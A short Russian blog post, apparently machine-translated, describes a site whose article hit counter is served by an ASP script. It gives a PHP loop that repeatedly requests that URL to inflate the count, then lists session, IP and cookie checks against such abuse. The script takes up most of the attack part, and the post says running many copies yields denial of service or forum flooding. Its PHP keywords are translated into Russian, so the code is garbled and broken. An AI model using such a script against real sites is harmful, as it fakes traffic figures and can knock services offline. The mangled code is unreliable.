Сегодня я случайно увидел сайт, счетчик которого можно обновить на статической странице. Я подумал, что это нужно сделать с помощью js. Когда я открыл исходный код, оказалось:
<div align=center><SPAN class=Article_tdbgall>.
Автор: Неизвестный Источник статьи: Meidi.Net
Количество кликов:
<script Language='javascript' src='/Article/GetHits.asp?ArticleID=759'></script>
Время обновления: 27 мая 2005 г./SPAN>.
</div>
За количеством кликов следует файл asp для обработки, поэтому я открою этот файл и посмотрю:
document.write('210');
Правильно, это файл GetHists.asp, который обрабатывает ArticleID и извлекает результаты и выводит количество раз: document.write('количество раз'), на который можно напрямую ссылаться на статической странице.
Плохие парни все-таки плохие, поэтому я подумал, как мне быстро увеличить количество кликов? Ручное обновление не очень полезно. Что ж, быстро напишите программу PHP для автоматического доступа к этому файлу.
PHP-код выглядит следующим образом:
<?php
/* access_url.php */
define(SUM, 1000 //Необходимое количество посещений);
define(L_TIME, 1000); // Принудительное время выполнения скрипта
define(S_TIME, 1); // Время сна между каждым посещением;
$url = " http://www.xxx.com/Article/GetHits.asp?ArticleID=759 " //Адрес, к которому нужно получить доступ.
set_time_limit(L_TIME);
//Доступ к указанной функции URL Knowsky.com);
функция access_url($url)
{
if ($url=='') возвращает false;
$fp = fopen($url, 'r') or exit('Открыть URL-адрес не удалось!');
если ($fp) {
в то время как (!feof($fp)) {
$file = fgets($fp);
echo $file."n<p> </p>n";
}
не установлено ($ файл);
}
}
//Тест
для ($i=0; $i<SUM; $i++) {
access_url($url);
спать (S_TIME);
}
?>
Запустите вышеуказанную программу, после чего доступ к указанному URL-адресу будет осуществляться постоянно, и, естественно, количество обращений будет продолжать увеличиваться, достигая эффекта флуда. Если трафик большой и для его запуска используется несколько программ, легко добиться эффекта отказа в обслуживании (DoS). Если другая сторона примет превентивные меры, изменит код и отправит его на форум, легко добиться эффекта затопления форума.
Методы предотвращения:
1. Используйте механизм сеанса в коде. При отправке пользователем генерируется идентификатор сеанса. При отправке контента оценивается, был ли он отправлен, чистка не разрешена.
2. После отправки пользователем IP-адрес пользователя записывается. Если пользователь отправляет повторно в течение указанного времени, дальнейшая отправка не допускается.
3. После того как пользователь отправляет контент, на клиенте пользователя записывается файл cookie. Если пользователь отправляет контент еще раз, проверьте, есть ли на клиенте файл cookie, чтобы определить, разрешена ли отправка.
Есть много других способов, вы можете поискать их или использовать свое воображение, чтобы добиться большего.